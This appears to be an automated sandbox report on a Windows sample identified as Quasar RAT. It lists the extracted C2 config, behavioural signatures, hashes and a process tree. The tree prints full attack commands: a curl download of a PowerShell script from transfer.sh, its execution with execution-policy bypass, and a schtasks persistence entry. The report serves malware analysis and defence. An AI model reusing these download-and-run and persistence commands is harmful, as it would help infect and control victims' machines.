Analysis
max time kernel: 74s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
submitted: 20/01/2023, 04:31
Static task: static1
Behavioral task: behavioral1 (Sample: view.exe, Resource: win7-20220812-en)
Behavioral task: behavioral2 (Sample: view.exe, Resource: win10v2004-20220812-en)
General
Target: view.exe
Size: 547KB
MD5: b0ab211e83a23d58e1322e4d2d6f0a96
SHA1: d568fbcd41e30651cc80ba8a5e9eeab637a99f9e
SHA256: 3459ebc48502fb42337647d456681337d303e50a99ca536e010d7cf1ebf6f0f5
SHA512: 4a54251fbf23fe3d0e96fcf8d3363e917921644a178387b619367338faa1884134639dd696d55a5a9f06cf167f128d599cc57fb62dba603afc4ebb287d22204d
SSDEEP: 3072:SvGyYiSDnt1G5GWp1icKAArDZz4N9GhbkrNEk184:W4wp0yN90QEg
Malware Config
Extracted
quasar
1.4.0
Office04
ghcc.duckdns.org:4782
a9c03eb7-f3c1-4b9e-a4f7-1962d17a793b
encryption_key: B0326395AC2D48856CAE22978A087DF5DCF5816D
install_name: Client.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Update
subdirectory: SubDir
Signatures

Quasar payload (2 IoCs)
resource | yara_rule
behavioral2/memory/3740-145-0x000000000047E74E-mapping.dmp | family_quasar
behavioral2/memory/3740-147-0x0000000000340000-0x00000000003C4000-memory.dmp | family_quasar

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation | WScript.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | view.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | view.exe

Looks up external IP address via web service (2 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
91 | api.ipify.org
92 | api.ipify.org

Suspicious use of SetThreadContext (1 IoC)
description | pid | Process | procid_target
PID 3920 set thread context of 3740 | 3920 | powershell.exe | 97

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | Process
3160 | schtasks.exe

Modifies registry class (1 IoC)
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings | cmd.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
3920 | powershell.exe
3920 | powershell.exe

Suspicious use of AdjustPrivilegeToken (2 IoCs)
description | pid | Process
Token: SeDebugPrivilege | 3920 | powershell.exe
Token: SeDebugPrivilege | 3740 | RegAsm.exe

Suspicious use of SetWindowsHookEx (1 IoC)
pid | Process
3740 | RegAsm.exe

Suspicious use of WriteProcessMemory (27 IoCs, identical events grouped with a count)
description | pid | Process | procid_target | count
PID 4728 wrote to memory of 1404 | 4728 | view.exe | 79 | 2
PID 1404 wrote to memory of 5072 | 1404 | cmd.exe | 81 | 2
PID 5072 wrote to memory of 4408 | 5072 | WScript.exe | 84 | 2
PID 4408 wrote to memory of 4328 | 4408 | cmd.exe | 86 | 2
PID 4328 wrote to memory of 1140 | 4328 | cmd.exe | 87 | 2
PID 5072 wrote to memory of 3524 | 5072 | WScript.exe | 93 | 2
PID 3524 wrote to memory of 2248 | 3524 | cmd.exe | 95 | 2
PID 2248 wrote to memory of 3920 | 2248 | cmd.exe | 96 | 2
PID 3920 wrote to memory of 3740 | 3920 | powershell.exe | 97 | 8
PID 3740 wrote to memory of 3160 | 3740 | RegAsm.exe | 98 | 3
Processes (indentation shows parent/child depth)

1. C:\Users\Admin\AppData\Local\Temp\view.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\view.exe"
   PID: 4728
   - Adds Run key to start application
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SYSTEM32\cmd.exe
      Command line: cmd /c new.vbs
      PID: 1404
      - Checks computer location settings
      - Modifies registry class
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WScript.exe
         Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\new.vbs"
         PID: 5072
         - Checks computer location settings
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\System32\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
            PID: 4408
            - Suspicious use of WriteProcessMemory

            5. C:\Windows\system32\cmd.exe
               Command line: cmd.exe /c curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
               PID: 4328
               - Suspicious use of WriteProcessMemory

               6. C:\Windows\system32\curl.exe
                  Command line: curl https://transfer.sh/get/MHXbtP/ss.ps1 --output C:\Users\Admin\AppData\Roaming\rr.ps1
                  PID: 1140

         4. C:\Windows\System32\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /c cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
            PID: 3524
            - Suspicious use of WriteProcessMemory

            5. C:\Windows\system32\cmd.exe
               Command line: cmd.exe /c powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
               PID: 2248
               - Suspicious use of WriteProcessMemory

               6. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: powershell.exe -exec Bypass -C C:\Users\Admin\AppData\Roaming\rr.ps1
                  PID: 3920
                  - Suspicious use of SetThreadContext
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
                  - Suspicious use of WriteProcessMemory

                  7. C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                     Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                     PID: 3740
                     - Suspicious use of AdjustPrivilegeToken
                     - Suspicious use of SetWindowsHookEx
                     - Suspicious use of WriteProcessMemory

                     8. C:\Windows\SysWOW64\schtasks.exe
                        Command line: "schtasks" /create /tn "Update" /sc ONLOGON /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /rl HIGHEST /f
                        PID: 3160
                        - Creates scheduled task(s)
Network
MITRE ATT&CK Enterprise v6
Downloads

Filesize: 300.0MB
MD5: f7e7099eea0cc25fc49d04cd53c573a1
SHA1: 3abac9f3f93b0f87ef432d70c40e8ab865157770
SHA256: b7f331e83a80b15cc4537324bde827ac9b2ecb990150db4d00d84ee2560cf5be
SHA512: c19ddc5e41ed6d485f5df47996f34ff326a782e909bffaa8aa31a3f72fddb33cc7e3709e0cc44b2078668dc83297b42bb3157d6d000a9323ffca6303cd43f074

Filesize: 5.1MB
MD5: 970aca768e68faa580f758a1a379686b
SHA1: 6a93921485cbd83382eb5a47315b1f0a67bcf684
SHA256: 6c1e62385d660ca43e024d461154fbb4805e429cdf7850d19510d7f69533739e
SHA512: 66dd4c5b17978e68c8e0cd2bc4fd35ba5d519447ff34259ec77d11e4253cbfc9955a43915ed3c343f41dc04d97f4302ab6922a823b0e0da44e8893d29ec7cf0f